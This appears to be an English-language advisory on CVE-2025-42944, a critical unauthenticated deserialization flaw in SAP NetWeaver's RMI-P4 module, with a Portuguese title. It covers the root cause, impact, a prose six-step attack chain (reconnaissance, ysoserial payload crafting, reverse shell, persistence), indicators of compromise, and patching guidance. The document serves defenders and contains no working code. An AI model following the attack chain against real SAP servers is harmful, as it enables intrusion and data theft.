CVE-2025-42944: 
SAP NetWeaver Application Server Java Análise e mitigação de vulnerabilidades

CVE-2025-42944 is a critical deserialization vulnerability in SAP NetWeaver's RMI-P4 module that allows unauthenticated remote attackers to execute arbitrary operating system commands by submitting malicious Java object payloads to an exposed port. The vulnerability affects SAP NetWeaver SERVERCORE version 7.50 and was publicly disclosed on September 9, 2025, coinciding with SAP's September 2025 Patch Day. It carries a CVSS v3.1 base score of 10.0 (Critical), the maximum possible severity (Red Hat CVE, ENISA EUVD, SAP Security Notes).

The root cause is improper deserialization of untrusted data (CWE-502) within SAP NetWeaver's RMI-P4 (Remote Method Invocation over P4 protocol) module. An unauthenticated attacker can send a crafted malicious Java object payload directly to the open RMI-P4 port; when the server deserializes this payload, it triggers arbitrary OS command execution in the context of the SAP service account. The attack requires no authentication, no user interaction, and has low complexity, as the RMI-P4 port is network-accessible and the deserialization occurs without input validation. The vulnerability is mapped to CAPEC-586 (Object Injection) and a public proof-of-concept exploit has been published (GitHub PoC, RedRays Blog, ZeroPath Blog).

Successful exploitation grants an unauthenticated attacker full OS command execution on the affected SAP NetWeaver server, resulting in complete compromise of confidentiality, integrity, and availability. Attackers can exfiltrate sensitive business data, modify or destroy system components, install backdoors or ransomware, and use the compromised SAP server as a pivot point for lateral movement within the enterprise network. Given SAP NetWeaver's role as a core ERP platform in large enterprises and government organizations, exploitation could expose critical financial, HR, and operational data (Feedly Intel, Arctic Wolf, Security Affairs).

1. Reconnaissance: Identify internet-facing or internally exposed SAP NetWeaver SERVERCORE 7.50 instances using tools like Shodan, Censys, or FOFA, searching for open RMI-P4 ports (typically TCP 50004 or similar SAP message server ports).
2. Port identification: Confirm the RMI-P4 service is accessible by probing the target port for SAP-specific protocol banners or responses.
3. Payload crafting: Construct a malicious serialized Java object payload using tools such as ysoserial or similar Java deserialization exploit frameworks, targeting gadget chains compatible with SAP NetWeaver's classpath.
4. Payload delivery: Submit the crafted serialized payload directly to the open RMI-P4 port without any authentication credentials.
5. Command execution: The SAP NetWeaver server deserializes the untrusted Java object, triggering the embedded gadget chain and executing arbitrary OS commands as the SAP service account (e.g., establishing a reverse shell, creating a backdoor user, or exfiltrating data).
6. Post-exploitation: Use the gained shell access to escalate privileges, move laterally within the network, or deploy persistent malware (GitHub PoC, RedRays Blog, ZeroPath Blog).

• Network: Unexpected inbound connections to SAP RMI-P4 ports (e.g., TCP 50004, 50104) from external or untrusted IP addresses; outbound connections from the SAP server to unknown external IPs (potential reverse shell or C2 traffic).
• Logs: SAP system logs showing Java deserialization errors or unexpected class loading events in the RMI-P4 service; OS-level audit logs recording unusual process spawning by the SAP service account (e.g., cmd.exe, /bin/bash, powershell.exe, curl, wget).
• Process: Child processes spawned by the SAP Java process (e.g., java.exe or jstart.exe) executing system commands, network utilities, or scripting interpreters not typical for normal SAP operations.
• File System: New or modified files in SAP installation directories, unexpected scripts or executables, new scheduled tasks or cron jobs created by the SAP service account, or web shells placed in accessible directories.
• Registry/Config: Unauthorized changes to SAP configuration files or new user accounts created in the OS or SAP system following exploitation (Arctic Wolf, RedRays Blog).

SAP addressed this vulnerability as part of the September 2025 Patch Day; organizations should apply SAP Security Note 3634501 immediately, which provides the official patch for SAP NetWeaver SERVERCORE 7.50 (SAP Security Notes Sep 2025, SAP Note 3634501). As an interim workaround, restrict network access to RMI-P4 ports using firewall rules and network segmentation, ensuring these ports are not exposed to untrusted networks or the internet. Organizations should also monitor for suspicious deserialization activity and review SAP service account privileges to limit the blast radius of any potential exploitation (Onapsis Sep 2025, Arctic Wolf).

The vulnerability received significant attention from the security community upon disclosure, with multiple outlets including BleepingComputer, The Hacker News, Security Affairs, and Ars Technica covering it as a maximum-severity SAP flaw (BleepingComputer, The Hacker News). SAP security specialists Onapsis and SecurityBridge published detailed patch day analyses highlighting CVE-2025-42944 as the most critical issue of the September 2025 cycle (Onapsis Sep 2025, SecurityBridge). National CERTs including Ireland's NCSC, Belgium's CCB, Singapore's CSA, and Pakistan's NCERT issued advisories urging immediate patching, reflecting the broad enterprise impact of the vulnerability. Social media discussions on Mastodon, Bluesky, and Reddit highlighted the urgency given the CVSS 10.0 score and public PoC availability.